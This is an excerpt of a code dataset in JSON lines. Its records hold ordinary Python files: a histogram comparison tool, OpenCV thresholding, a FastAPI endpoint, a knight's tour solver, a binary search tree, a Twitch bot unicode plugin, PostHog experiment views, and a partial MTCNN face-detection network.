print('¡ERROR! Debe ingresar un número')\n\n finally:\n print('El programa terminó')\n\n\nif __name__ == '__main__':\n run()","repo_name":"fraboto/Data-Science-Study","sub_path":"InterPython/try_except.py","file_name":"try_except.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18090052265","text":"#!/usr/bin/env python\nimport numpy as np\nimport pyfits\nimport pdb\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom mpltools import style\nstyle.use('ggplot')\n\n\n\"\"\"\nSimple routine for visualizing how representative a training set is of\nits testing set. This is useful for supervised machine learning methods\nthat rely on having a representative training set for accurate model\nprediction. Each routine takes two column names and a two pandas\ndataframes containing the training and testing data.\n\nExample:\n\nimport represent\nrepresent.hists(\"Elevation\", \"Rainfall\", train, test)\n\"\"\"\n\n\ndef hists(var1, var2, train, test):\n\n \"\"\"\n Plot normalized training/testing sets versus var1 and var2\n \"\"\"\n\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 15))\n ax1.set_title('Testing Set')\n ax1.set_xlabel(var1)\n ax1.set_ylabel(var2)\n ax1.set_frame_on(True)\n\n ax2.set_title('Training Set')\n ax2.set_xlabel(var1)\n ax2.set_ylabel(var2)\n ax2.set_frame_on(True)\n\n min1 = np.min(np.array([np.min(test[var1]), np.min(train[var1])]))\n max1 = np.max(np.array([np.max(test[var1]), np.max(train[var1])]))\n min2 = np.min(np.array([np.min(test[var2]), np.min(train[var2])]))\n max2 = np.max(np.array([np.max(test[var2]), np.max(train[var2])]))\n\n H1, xedges1, yedges1, img1 = plt.hist2d(test[var1], test[var2],\n bins=100, range=np.array([(min1, max1), (min2, max2)]),\n cmap=plt.cm.jet, normed=True)\n extent = [yedges1[0], yedges1[-1], xedges1[0], xedges1[-1]]\n H2, xedges2, yedges2, img2 = plt.hist2d(train[var1], train[var2],\n bins=100, range=np.array([(min1, max1), (min2, max2)]),\n cmap=plt.cm.jet, normed=True)\n\n colormax = np.max(np.array([np.max(H1), np.max(H2)]))\n im1 = ax1.imshow(np.rot90(H1), cmap=plt.cm.jet, extent=extent,\n vmax=colormax)\n im2 = ax2.imshow(np.rot90(H2), extent=extent, cmap=plt.cm.jet,\n vmax=colormax)\n\n fig.colorbar(im2, ax=ax2)\n fig.colorbar(im1, ax=ax1)\n plt.show()\n plt.savefig(var1 + '_v_' + var2 + '.png')\n plt.close('all')\n\n\ndef ratio(var1, var2, train, test):\n\n \"\"\"\n Plot ratio of histograms of train to test sets\n \"\"\"\n\n G1, xedges1, yedges1, img1 = plt.hist2d(test[var1], test[var2],\n bins=100, cmap=plt.cm.jet)\n G2, xedges2, yedges2, img2 = plt.hist2d(train[var1], train[var2],\n bins=100, cmap=plt.cm.jet)\n G = G2 / G1\n plt.close('all')\n\n fig, ax = plt.subplots(1, 1)\n extent = [yedges1[0], yedges1[-1], xedges1[0], xedges1[-1]]\n im1 = ax.imshow(np.rot90(G), cmap=plt.cm.jet, extent=extent)\n fig.colorbar(im1, ax=ax)\n ax.set_title('Ratio of Train/Test Densities')\n ax.set_xlabel(var1)\n ax.set_ylabel(var2)\n ax.set_frame_on(True)\n plt.show()\n plt.savefig(var1 + '_v_' + var2 + '_ratio.png')\n","repo_name":"redshiftzero/represent","sub_path":"represent.py","file_name":"represent.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18304421051","text":"import cv2 as cv\nimport numpy as np\n\nimg=cv.imread('Photos/cats.jpg')\ncv.imshow('Cats',img)\n\ngray=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\ncv.imshow('Gray Image',gray)\n\n#Simple Thresholding\nthreshold,thresh=cv.threshold(gray,150,255,cv.THRESH_BINARY)\ncv.imshow('Simple Thresholded Image',thresh)\n\nthreshold,thresh_inv=cv.threshold(gray,150,255,cv.THRESH_BINARY_INV)\ncv.imshow('Simple Inverse Thresholded Image',thresh_inv)\n\n#Adaptive thresholding-->essentially computed optimal threshold value on the basis of the mean\nadaptive_thresh=cv.adaptiveThreshold(gray,255,cv.ADAPTIVE_THRESH_MEAN_C,cv.THRESH_BINARY,11,9)\ncv.imshow('Adaptive Thresholded Image',adaptive_thresh)\n\nadaptive_thresh_inv=cv.adaptiveThreshold(gray,255,cv.ADAPTIVE_THRESH_MEAN_C,cv.THRESH_BINARY_INV,11,9)\ncv.imshow('Inverse Adaptive Thresholded Image',adaptive_thresh_inv)\n\ncv.waitKey(0)","repo_name":"SHAHYASHNILESH/OpenCV-","sub_path":"thresh.py","file_name":"thresh.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19628479399","text":"from http import HTTPStatus\nfrom typing import List\n\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom opentelemetry import trace\nfrom pydantic import BaseModel\nfrom sqlalchemy import update\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom api.permissions import Role, requires_role\nfrom common.database import Application, ApplicationStatus, with_db\nfrom common.tasks import broadcast\n\nrouter = APIRouter()\ntracer = trace.get_tracer(__name__)\n\n\nclass BulkSetStatus(BaseModel):\n status: ApplicationStatus\n ids: List[int]\n\n\n@router.put(\n \"/status\",\n status_code=HTTPStatus.NO_CONTENT,\n name=\"Bulk update application status\",\n dependencies=[Depends(requires_role(Role.Organizer))],\n)\nasync def bulk_set_status(params: BulkSetStatus, db: AsyncSession = Depends(with_db)):\n \"\"\"\n Set the status for a number of participant applications\n \"\"\"\n\n if params.status == ApplicationStatus.PENDING:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=f\"application status cannot be set to '{params.status}'\",\n )\n\n statement = (\n update(Application)\n .where(Application.participant_id.in_(params.ids)) # type: ignore\n .where(Application.status == ApplicationStatus.PENDING)\n .values(status=params.status)\n )\n await db.execute(statement)\n await db.commit()\n\n for id in params.ids:\n await broadcast(\"registration\", params.status.value, participant_id=id)\n","repo_name":"WaffleHacks/application-portal","sub_path":"api/registration/bulk.py","file_name":"bulk.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"15947967606","text":"def print_board():\n for r in T:\n print(r)\n\n\ndef func(x, y, cnt):\n T[x][y] = cnt\n if cnt == target_cnt:\n return True\n else:\n for v in vectors:\n _x = x + v[0]\n _y = y + v[1]\n if 0 <= _x and _x < N and 0 <= _y and _y < N:\n if T[_x][_y] == 0:\n if func(_x, _y, cnt+1):\n return True\n\n T[x][y] = 0\n return False\n\n\nN = int(input())\nT = [[0 for _ in range(N)] for _ in range(N)]\ntarget_cnt = N*N\nvectors = ((-2, 1), (-1, 2), (1, 2), (2, 1), (2, -1), (1, -2), (-1, -2), (-2, -1))\n\nfor x in range(N):\n for y in range(N):\n if func(x, y, 1):\n print_board()\n exit()\n\nprint('no solution')\n","repo_name":"proman3419/AGH-WIET-INF-WDI-2020","sub_path":"6/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32003450446","text":"# Name: Randy Shao\n# Student Number: 20100992\n\nclass Node:\n # instance variables\n def __init__(self, value):\n self.value = value\n self.leftChild = None\n self.rightChild = None\n\nclass Tree:\n def __init__(self):\n self.root = None\n self.count = 0\n\n def search(self, x):\n node = self.root\n while node is not None:\n if node.value == x:\n return node.value\n elif node.value > x:\n node = node.leftChild\n else:\n node = node.rightChild\n return None\n\n def searchPath(self, x, pathArray):\n node = self.root\n while node is not None:\n if node.value == x:\n pathArray.append(node.value)\n return pathArray\n elif node.value > x:\n pathArray.append(node.value)\n node = node.leftChild\n else:\n pathArray.append(node.value)\n node = node.rightChild\n return None\n\n def insert(self, x):\n self.count += 1\n self.root = self.recInsert(self.root, x)\n\n def recInsert(self, node, x):\n if node is None:\n self.root = Node(x)\n return self.root\n elif node.value >= x:\n node.leftChild = self.recInsert(node.leftChild, x)\n else:\n node.rightChild = self.recInsert(node.rightChild, x)\n return node\n\n def delete(self, x):\n self.root = self.recDelete(self.root, x)\n\n def recDelete(self, node, x):\n if node is None:\n return node\n else:\n if node.value < x:\n node.rightChild = self.recDelete(node.rightChild, x)\n return node\n elif node.value > x:\n node.leftChild = self.recDelete(node.leftChild, x)\n return node\n else:\n if node.leftChild is None:\n return node.rightChild\n elif node.rightChild is None:\n return node.leftChild\n else:\n tmp = self.fix_left_subtree(node)\n tmp.rightChild = node.rightChild\n return tmp\n\n def fix_left_subtree(self, v):\n temp = v.leftChild # temp is the root of v’s\n\n # left subtree\n if temp.rightChild is None:\n return temp # no fix needed\n else:\n parent = None\n node = temp\n while node.rightChild is not None:\n parent = node\n node = node.rightChild\n parent.rightChild = node.leftChild\n node.leftChild = temp\n return node\n\n def averageDepth(self):\n total = self.calcDepth(self.root, [], 1)\n count = 0\n for i in total:\n count += i\n return count / self.count\n\n def calcDepth(self, node, avgDepth, counter):\n\n if node is None:\n return 0\n else:\n self.calcDepth(node.leftChild, avgDepth, counter + 1)\n avgDepth.append(counter)\n self.calcDepth(node.rightChild, avgDepth, counter + 1)\n return avgDepth\n\n def maxDepth(self, node):\n if node is None:\n return 0\n leftDepth = self.maxDepth(node.leftChild)\n rightDepth = self.maxDepth(node.rightChild)\n\n if leftDepth > rightDepth:\n return leftDepth + 1\n else:\n return rightDepth + 1\n\n def preOrder(self, x):\n if x is None:\n return\n else:\n print(x.value)\n self.preOrder(x.leftChild)\n self.preOrder(x.rightChild)\n\nif __name__ == \"__main__\":\n bst = Tree()\n nodeArray = [6, 3, 17, 8, 20, 7, 12, 10]\n for node in nodeArray:\n bst.insert(node)\n print(\"Binary Search Tree Values: \")\n bst.preOrder(bst.root)\n for node in nodeArray:\n print(\"Search value: \", bst.search(node))\n for node in nodeArray:\n print(\"Search Path: \", bst.searchPath(node, []))\n print(\"Average Depth: \", bst.averageDepth())\n print(\"Max Depth: \", bst.maxDepth(bst.root))\n bst.delete(17)\n print(\"Updated Binary Search Tree:\")\n bst.preOrder(bst.root)\n\n\n\n\n\n\n\n\n\n","repo_name":"randyshao/Data-Structures-Algorithms","sub_path":"cisc235_assn3/assn3.py","file_name":"assn3.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"480069436","text":"import sqlite3\nconn = sqlite3.connect('test.db')\nprint('Opened DB succesfully')\n\ndef printDB():\n\ta = conn.execute(\"SELECT * FROM Employee\");\n\tfor row in a:\n\t\tprint(row)\n\nconn.execute(\"DROP TABLE IF EXISTS Employee;\")\nconn.execute(''' \n\tCREATE TABLE IF NOT EXISTS Employee(\n\tid INTEGER PRIMARY KEY AUTOINCREMENT,\n\tname TEXT NOT NULL); ''')\n\nprint('Table created succesfully')\n\nconn.execute(\"INSERT INTO Employee(name) VALUES('Devang')\");\nconn.execute(\"INSERT INTO Employee(name) VALUES('Nimesh')\");\n\nprintDB()\n\nid, name = input().split()\nid = int(id)\nconn.execute(f\"UPDATE Employee SET name = \\'{name}\\' WHERE id = {id}\")\n\nprintDB()\n# conn.commit()","repo_name":"devangrajarora/sem-5-labs","sub_path":"AP Lab/Tkinter and SQLite/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34332761838","text":"import typing\nimport unicodedata\n\nimport util_bot\nfrom plugins.utils import arg_parser\n\ntry:\n import plugin_hastebin\nexcept ImportError:\n import plugins.plugin_hastebin as plugin_hastebin_module\n\n plugin_hastebin: plugin_hastebin_module.Plugin\n exit(1)\ntry:\n import plugin_chat_cache\nexcept ImportError:\n import plugins.plugin_chat_cache as plugin_chat_cache_module\n\n plugin_chat_cache: plugin_chat_cache_module.Plugin\n exit(1)\n\nNAME = 'unicodedata'\n__meta_data__ = {\n 'name': f'plugin_{NAME}',\n 'commands': []\n}\nlog = util_bot.make_log_function(NAME)\n\n\nclass Plugin(util_bot.Plugin):\n commands = ['unicode']\n name = NAME\n no_reload = False\n\n def __init__(self, module, source):\n super().__init__(module, source)\n self.command_unicode = util_bot.bot.add_command(\n 'unicode',\n cooldown=util_bot.CommandCooldown(1, 0, 0) # prevent vip spam and that's it\n )(self.command_unicode)\n\n def _explain_char(self, ch, further):\n try:\n name = unicodedata.name(ch)\n except ValueError:\n name = f'[U+{hex(ord(ch))[2:]}]'\n if not further:\n return name + f'({ch})'\n infos = {\n 'category': unicodedata.category(ch),\n 'direction': unicodedata.bidirectional(ch),\n 'east asian width': unicodedata.east_asian_width(ch)\n }\n\n decomposition = unicodedata.decomposition(ch)\n if decomposition:\n infos['decomposition'] = decomposition\n\n try:\n infos['digit value'] = unicodedata.digit(ch)\n except ValueError:\n pass\n try:\n infos['decimal value'] = unicodedata.decimal(ch)\n except ValueError:\n pass\n try:\n infos['numeric value'] = unicodedata.numeric(ch)\n except ValueError:\n pass\n comb = unicodedata.combining(ch)\n if comb != 0:\n infos['combining class'] = str(comb)\n\n mirrored = unicodedata.mirrored(ch)\n if mirrored:\n infos['mirrored'] = 'yes'\n if hasattr(unicodedata, 'is_normalized'):\n forms = []\n for form in ('NFC', 'NFD', 'NFKC', 'NFKD'):\n if unicodedata.is_normalized(form, ch):\n forms.append(form)\n if forms:\n infos['normalized'] = f'yes: {\", \".join(forms)}'\n else:\n infos['normalized'] = 'no'\n else:\n infos['normalized'] = 'unavailable'\n\n info = ', '.join([\n f'{k}: {v}'\n for k, v in infos.items()\n ])\n return f'{name}: {ch!r} ({info})'\n\n async def command_unicode(self, msg: util_bot.StandardizedMessage) \\\n -> typing.Union[str, typing.Tuple[util_bot.CommandResult, str]]:\n txt = msg.text.split(' ', 1)\n if len(txt) < 2:\n return (util_bot.CommandResult.OTHER_FAILED,\n f'Usage: unicode [--verbose]')\n try:\n args = arg_parser.parse_args(\n txt[1],\n {\n 'user': str,\n 'verbose': bool,\n arg_parser.POSITIONAL: str,\n },\n strict_escapes=False,\n strict_quotes=False,\n ignore_arg_zero=True,\n defaults={\n 'verbose': False,\n 'user': None\n }\n )\n except arg_parser.ParserError as e:\n return f'@{msg.user}, {e.message}'\n text = ' '.join(map(lambda pair: pair[1], filter(lambda pair: isinstance(pair[0], int), args.items())))\n if args['user']:\n last_messages = plugin_chat_cache.find_messages(\n msg.channel,\n user=args['user'].strip('@,').lower()\n )\n if len(last_messages) == 0 or (args['user'] == msg.user and len(last_messages) < 2):\n return (util_bot.CommandResult.OTHER_FAILED,\n f'@{msg.user}, User has no known recent messages.')\n if args['user'] == msg.user:\n text = last_messages[-2].text\n else:\n text = last_messages[-1].text\n\n explained = [self._explain_char(i, False) for i in text]\n out = ', '.join(explained)\n\n post = False\n why_post = ''\n if len(out) + len(msg.user) + 3 >= 499:\n why_post = 'Message was too long to fit. '\n post = True\n if args['verbose']:\n why_post = ''\n post = True\n\n if post:\n # message too long\n slug = await plugin_hastebin.upload('\\n'.join([self._explain_char(ch, True) for ch in text]))\n return (f'@{msg.user}, {why_post}Here is a hastebin: '\n f'{plugin_hastebin.hastebin_addr}{slug}')\n elif len(text) == 1:\n return f'@{msg.user}, {self._explain_char(text[0], True)}'\n else:\n return f'@{msg.user}, {out}'\n","repo_name":"Mm2PL/MmsUtilityBot","sub_path":"plugins/plugin_unicodedata.py","file_name":"plugin_unicodedata.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"39500805979","text":"from typing import Any, Callable, Optional\n\nfrom django.utils.timezone import now\nfrom rest_framework import serializers, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom statshog.defaults.django import statsd\n\nfrom ee.clickhouse.queries.experiments.funnel_experiment_result import (\n ClickhouseFunnelExperimentResult,\n)\nfrom ee.clickhouse.queries.experiments.secondary_experiment_result import (\n ClickhouseSecondaryExperimentResult,\n)\nfrom ee.clickhouse.queries.experiments.trend_experiment_result import (\n ClickhouseTrendExperimentResult,\n)\nfrom ee.clickhouse.queries.experiments.utils import requires_flag_warning\nfrom posthog.api.feature_flag import FeatureFlagSerializer, MinimalFeatureFlagSerializer\nfrom posthog.api.routing import StructuredViewSetMixin\nfrom posthog.api.shared import UserBasicSerializer\nfrom posthog.caching.insight_cache import update_cached_state\nfrom posthog.clickhouse.query_tagging import tag_queries\nfrom posthog.constants import INSIGHT_TRENDS, AvailableFeature\nfrom posthog.models.experiment import Experiment\nfrom posthog.models.filters.filter import Filter\nfrom posthog.permissions import (\n PremiumFeaturePermission,\n ProjectMembershipNecessaryPermissions,\n TeamMemberAccessPermission,\n)\nfrom posthog.utils import generate_cache_key, get_safe_cache\n\nEXPERIMENT_RESULTS_CACHE_DEFAULT_TTL = 60 * 30 # 30 minutes\n\n\ndef _calculate_experiment_results(experiment: Experiment, refresh: bool = False):\n filter = Filter(experiment.filters, team=experiment.team)\n\n exposure_filter_data = (experiment.parameters or {}).get(\"custom_exposure_filter\")\n exposure_filter = None\n if exposure_filter_data:\n exposure_filter = Filter(data=exposure_filter_data, team=experiment.team)\n\n if filter.insight == INSIGHT_TRENDS:\n calculate_func = lambda: ClickhouseTrendExperimentResult(\n filter,\n experiment.team,\n experiment.feature_flag,\n experiment.start_date,\n experiment.end_date,\n custom_exposure_filter=exposure_filter,\n ).get_results()\n else:\n calculate_func = lambda: ClickhouseFunnelExperimentResult(\n filter,\n experiment.team,\n experiment.feature_flag,\n experiment.start_date,\n experiment.end_date,\n ).get_results()\n\n return _experiment_results_cached(\n experiment,\n \"primary\",\n filter,\n calculate_func,\n refresh=refresh,\n exposure_filter=exposure_filter,\n )\n\n\ndef _calculate_secondary_experiment_results(experiment: Experiment, parsed_id: int, refresh: bool = False):\n filter = Filter(experiment.secondary_metrics[parsed_id][\"filters\"], team=experiment.team)\n\n # TODO: refactor such that ClickhouseSecondaryExperimentResult's get_results doesn't return a dict\n calculate_func = lambda: ClickhouseSecondaryExperimentResult(\n filter,\n experiment.team,\n experiment.feature_flag,\n experiment.start_date,\n experiment.end_date,\n ).get_results()[\"result\"]\n\n return _experiment_results_cached(experiment, \"secondary\", filter, calculate_func, refresh=refresh)\n\n\ndef _experiment_results_cached(\n experiment: Experiment,\n results_type: str,\n filter: Filter,\n calculate_func: Callable,\n refresh: bool,\n exposure_filter: Optional[Filter] = None,\n):\n cache_filter = filter.shallow_clone(\n {\n \"date_from\": experiment.start_date,\n \"date_to\": experiment.end_date if experiment.end_date else None,\n }\n )\n\n exposure_suffix = \"\" if not exposure_filter else f\"_{exposure_filter.toJSON()}\"\n\n cache_key = generate_cache_key(\n f\"experiment_{results_type}_{cache_filter.toJSON()}_{experiment.team.pk}_{experiment.pk}{exposure_suffix}\"\n )\n\n tag_queries(cache_key=cache_key)\n\n cached_result_package = get_safe_cache(cache_key)\n\n if cached_result_package and cached_result_package.get(\"result\") and not refresh:\n cached_result_package[\"is_cached\"] = True\n statsd.incr(\n \"posthog_cached_function_cache_hit\",\n tags={\"route\": \"/projects/:id/experiments/:experiment_id/results\"},\n )\n return cached_result_package\n\n statsd.incr(\n \"posthog_cached_function_cache_miss\",\n tags={\"route\": \"/projects/:id/experiments/:experiment_id/results\"},\n )\n\n result = calculate_func()\n\n timestamp = now()\n fresh_result_package = {\"result\": result, \"last_refresh\": now(), \"is_cached\": False}\n\n update_cached_state(\n experiment.team.pk,\n cache_key,\n timestamp,\n fresh_result_package,\n ttl=EXPERIMENT_RESULTS_CACHE_DEFAULT_TTL,\n )\n\n return fresh_result_package\n\n\nclass ExperimentSerializer(serializers.ModelSerializer):\n feature_flag_key = serializers.CharField(source=\"get_feature_flag_key\")\n created_by = UserBasicSerializer(read_only=True)\n feature_flag = MinimalFeatureFlagSerializer(read_only=True)\n\n class Meta:\n model = Experiment\n fields = [\n \"id\",\n \"name\",\n \"description\",\n \"start_date\",\n \"end_date\",\n \"feature_flag_key\",\n \"feature_flag\",\n \"parameters\",\n \"secondary_metrics\",\n \"filters\",\n \"archived\",\n \"created_by\",\n \"created_at\",\n \"updated_at\",\n ]\n read_only_fields = [\n \"id\",\n \"created_by\",\n \"created_at\",\n \"updated_at\",\n \"feature_flag\",\n ]\n\n def validate_parameters(self, value):\n if not value:\n return value\n\n variants = value.get(\"feature_flag_variants\", [])\n\n if len(variants) >= 11:\n raise ValidationError(\"Feature flag variants must be less than 11\")\n elif len(variants) > 0:\n if \"control\" not in [variant[\"key\"] for variant in variants]:\n raise ValidationError(\"Feature flag variants must contain a control variant\")\n\n return value\n\n def create(self, validated_data: dict, *args: Any, **kwargs: Any) -> Experiment:\n if not validated_data.get(\"filters\"):\n raise ValidationError(\"Filters are required to create an Experiment\")\n\n variants = []\n aggregation_group_type_index = None\n if validated_data[\"parameters\"]:\n variants = validated_data[\"parameters\"].get(\"feature_flag_variants\", [])\n aggregation_group_type_index = validated_data[\"parameters\"].get(\"aggregation_group_type_index\")\n\n request = self.context[\"request\"]\n validated_data[\"created_by\"] = request.user\n\n feature_flag_key = validated_data.pop(\"get_feature_flag_key\")\n\n is_draft = \"start_date\" not in validated_data or validated_data[\"start_date\"] is None\n\n properties = validated_data[\"filters\"].get(\"properties\", [])\n\n if properties:\n raise ValidationError(\"Experiments do not support global filter properties\")\n\n default_variants = [\n {\"key\": \"control\", \"name\": \"Control Group\", \"rollout_percentage\": 50},\n {\"key\": \"test\", \"name\": \"Test Variant\", \"rollout_percentage\": 50},\n ]\n\n filters = {\n \"groups\": [{\"properties\": properties, \"rollout_percentage\": None}],\n \"multivariate\": {\"variants\": variants or default_variants},\n \"aggregation_group_type_index\": aggregation_group_type_index,\n }\n\n feature_flag_serializer = FeatureFlagSerializer(\n data={\n \"key\": feature_flag_key,\n \"name\": f'Feature Flag for Experiment {validated_data[\"name\"]}',\n \"filters\": filters,\n \"active\": not is_draft,\n },\n context=self.context,\n )\n\n feature_flag_serializer.is_valid(raise_exception=True)\n feature_flag = feature_flag_serializer.save()\n\n experiment = Experiment.objects.create(\n team_id=self.context[\"team_id\"], feature_flag=feature_flag, **validated_data\n )\n return experiment\n\n def update(self, instance: Experiment, validated_data: dict, *args: Any, **kwargs: Any) -> Experiment:\n has_start_date = validated_data.get(\"start_date\") is not None\n feature_flag = instance.feature_flag\n\n expected_keys = {\n \"name\",\n \"description\",\n \"start_date\",\n \"end_date\",\n \"filters\",\n \"parameters\",\n \"archived\",\n \"secondary_metrics\",\n }\n given_keys = set(validated_data.keys())\n extra_keys = given_keys - expected_keys\n\n if feature_flag.key == validated_data.get(\"get_feature_flag_key\"):\n extra_keys.remove(\"get_feature_flag_key\")\n\n if extra_keys:\n raise ValidationError(f\"Can't update keys: {', '.join(sorted(extra_keys))} on Experiment\")\n\n if \"feature_flag_variants\" in validated_data.get(\"parameters\", {}):\n if len(validated_data[\"parameters\"][\"feature_flag_variants\"]) != len(feature_flag.variants):\n raise ValidationError(\"Can't update feature_flag_variants on Experiment\")\n\n for variant in validated_data[\"parameters\"][\"feature_flag_variants\"]:\n if (\n len([ff_variant for ff_variant in feature_flag.variants if ff_variant[\"key\"] == variant[\"key\"]])\n != 1\n ):\n raise ValidationError(\"Can't update feature_flag_variants on Experiment\")\n\n properties = validated_data.get(\"filters\", {}).get(\"properties\")\n if properties:\n raise ValidationError(\"Experiments do not support global filter properties\")\n\n if instance.is_draft and has_start_date:\n feature_flag.active = True\n feature_flag.save()\n return super().update(instance, validated_data)\n else:\n # Not a draft, doesn't have start date\n # Or draft without start date\n return super().update(instance, validated_data)\n\n\nclass ClickhouseExperimentsViewSet(StructuredViewSetMixin, viewsets.ModelViewSet):\n serializer_class = ExperimentSerializer\n queryset = Experiment.objects.all()\n permission_classes = [\n IsAuthenticated,\n PremiumFeaturePermission,\n ProjectMembershipNecessaryPermissions,\n TeamMemberAccessPermission,\n ]\n premium_feature = AvailableFeature.EXPERIMENTATION\n ordering = \"-created_at\"\n\n def get_queryset(self):\n return super().get_queryset().prefetch_related(\"feature_flag\", \"created_by\")\n\n # ******************************************\n # /projects/:id/experiments/:experiment_id/results\n #\n # Returns current results of an experiment, and graphs\n # 1. Probability of success\n # 2. Funnel breakdown graph to display\n # ******************************************\n @action(methods=[\"GET\"], detail=True)\n def results(self, request: Request, *args: Any, **kwargs: Any) -> Response:\n experiment: Experiment = self.get_object()\n\n refresh = request.query_params.get(\"refresh\") is not None\n\n if not experiment.filters:\n raise ValidationError(\"Experiment has no target metric\")\n\n result = _calculate_experiment_results(experiment, refresh)\n\n return Response(result)\n\n # ******************************************\n # /projects/:id/experiments/:experiment_id/secondary_results?id=\n #\n # Returns values for secondary experiment metrics, broken down by variants\n # ******************************************\n @action(methods=[\"GET\"], detail=True)\n def secondary_results(self, request: Request, *args: Any, **kwargs: Any) -> Response:\n experiment: Experiment = self.get_object()\n\n refresh = request.query_params.get(\"refresh\") is not None\n\n if not experiment.secondary_metrics:\n raise ValidationError(\"Experiment has no secondary metrics\")\n\n metric_id = request.query_params.get(\"id\")\n\n if not metric_id:\n raise ValidationError(\"Secondary metric id is required\")\n\n try:\n parsed_id = int(metric_id)\n except ValueError:\n raise ValidationError(\"Secondary metric id must be an integer\")\n\n if parsed_id > len(experiment.secondary_metrics):\n raise ValidationError(\"Invalid metric ID\")\n\n result = _calculate_secondary_experiment_results(experiment, parsed_id, refresh)\n\n return Response(result)\n\n # ******************************************\n # /projects/:id/experiments/requires_flag_implementation\n #\n # Returns current results of an experiment, and graphs\n # 1. Probability of success\n # 2. Funnel breakdown graph to display\n # ******************************************\n @action(methods=[\"GET\"], detail=False)\n def requires_flag_implementation(self, request: Request, *args: Any, **kwargs: Any) -> Response:\n filter = Filter(request=request, team=self.team).shallow_clone({\"date_from\": \"-7d\", \"date_to\": \"\"})\n\n warning = requires_flag_warning(filter, self.team)\n\n return Response({\"result\": warning})\n","repo_name":"PostHog/posthog","sub_path":"ee/clickhouse/views/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":13419,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"9025559218","text":"import torch\nimport torch.nn as nn\nfrom abc import abstractmethod\nfrom collections import OrderedDict\n\n\nclass Flatten(nn.Module):\n\n def __init__(self):\n super(Flatten, self).__init__()\n\n def forward(self, x):\n \"\"\"\n Arguments:\n x: a float tensor with shape [batch_size, c, h, w].\n Returns:\n a float tensor with shape [batch_size, c*h*w].\n \"\"\"\n\n # without this pretrained model isn't working\n x = x.transpose(3, 2).contiguous()\n\n return x.view(x.size(0), -1)\n\n\nclass BaseNet(nn.Module):\n def __init__(\n self,\n ):\n super().__init__()\n self._init_net()\n self.apply(self.init_weight)\n\n @staticmethod\n def init_weight(\n m\n ):\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform(m.weight.data)\n nn.init.constant(m.bias, 0.1)\n\n @abstractmethod\n def _init_net(self):\n raise NotImplementedError(\n 'Please override this method (_init_net).'\n )\n\n @abstractmethod\n def forward(\n self,\n *args,\n **kwargs\n ):\n raise NotImplementedError(\n 'Please override this method (forward).'\n )\n\n\nclass PNet(BaseNet):\n def __init__(\n self,\n ):\n super().__init__()\n\n def _init_net(\n self,\n ):\n # backend\n self.body = nn.Sequential(OrderedDict([\n ('conv1', nn.Conv2d(3, 10, kernel_size=3, stride=1)),\n ('prelu1', nn.PReLU(10)),\n ('pool1', nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)),\n ('conv2', nn.Conv2d(10, 16, 3, 1)),\n ('prelu2', nn.PReLU(16)),\n ('conv3', nn.Conv2d(16, 32, kernel_size=3, stride=1)),\n ('prelu3', nn.PReLU(32))\n ]))\n\n # detection\n self.cls = nn.Sequential(OrderedDict([\n ('conv4-1', nn.Conv2d(32, 2, kernel_size=1, stride=1)),\n # ('softmax', nn.Softmax(1))\n ]))\n # bounding box regresion\n self.box_offset = nn.Sequential(OrderedDict([\n ('conv4-2', nn.Conv2d(32, 4, kernel_size=1, stride=1)),\n ]))\n\n # landmark regression\n self.landmarks = nn.Sequential(OrderedDict([\n ('conv4-2', nn.Conv2d(32, 10, kernel_size=1, stride=1))\n ]))\n\n def forward(\n self,\n x: torch.Tensor,\n *args,\n **kwargs\n ):\n feature_map = self.body(x)\n label = self.cls(feature_map)\n offset = self.box_offset(feature_map)\n landmarks = self.landmarks(feature_map)\n\n return {\n 'cls': label,\n 'pos_offset': offset,\n 'key_point': landmarks\n }\n\n\nclass RNet(BaseNet):\n def __init__(self):\n super().__init__()\n\n def _init_net(self):\n\n self.body = nn.Sequential(OrderedDict([\n ('conv1', nn.Conv2d(3, 28, kernel_size=3, stride=1)),\n ('prelu1', nn.PReLU(28)),\n ('pool1', nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True)),\n\n ('conv2', nn.Conv2d(28, 48, kernel_size=3, stride=1)),\n ('prelu2', nn.PReLU(48)),\n ('pool2', nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True)),\n\n ('conv3', nn.Conv2d(48, 64, kernel_size=2, stride=1)),\n ('prelu3', nn.PReLU(64)),\n\n ('flatten', Flatten()),\n ('conv4', nn.Linear(576, 128)),\n ('prelu4', nn.PReLU(128))\n ]))\n\n # detection\n self.cls = nn.Sequential(OrderedDict([\n ('conv5-1', nn.Linear(128, 2)),\n # ('softmax', 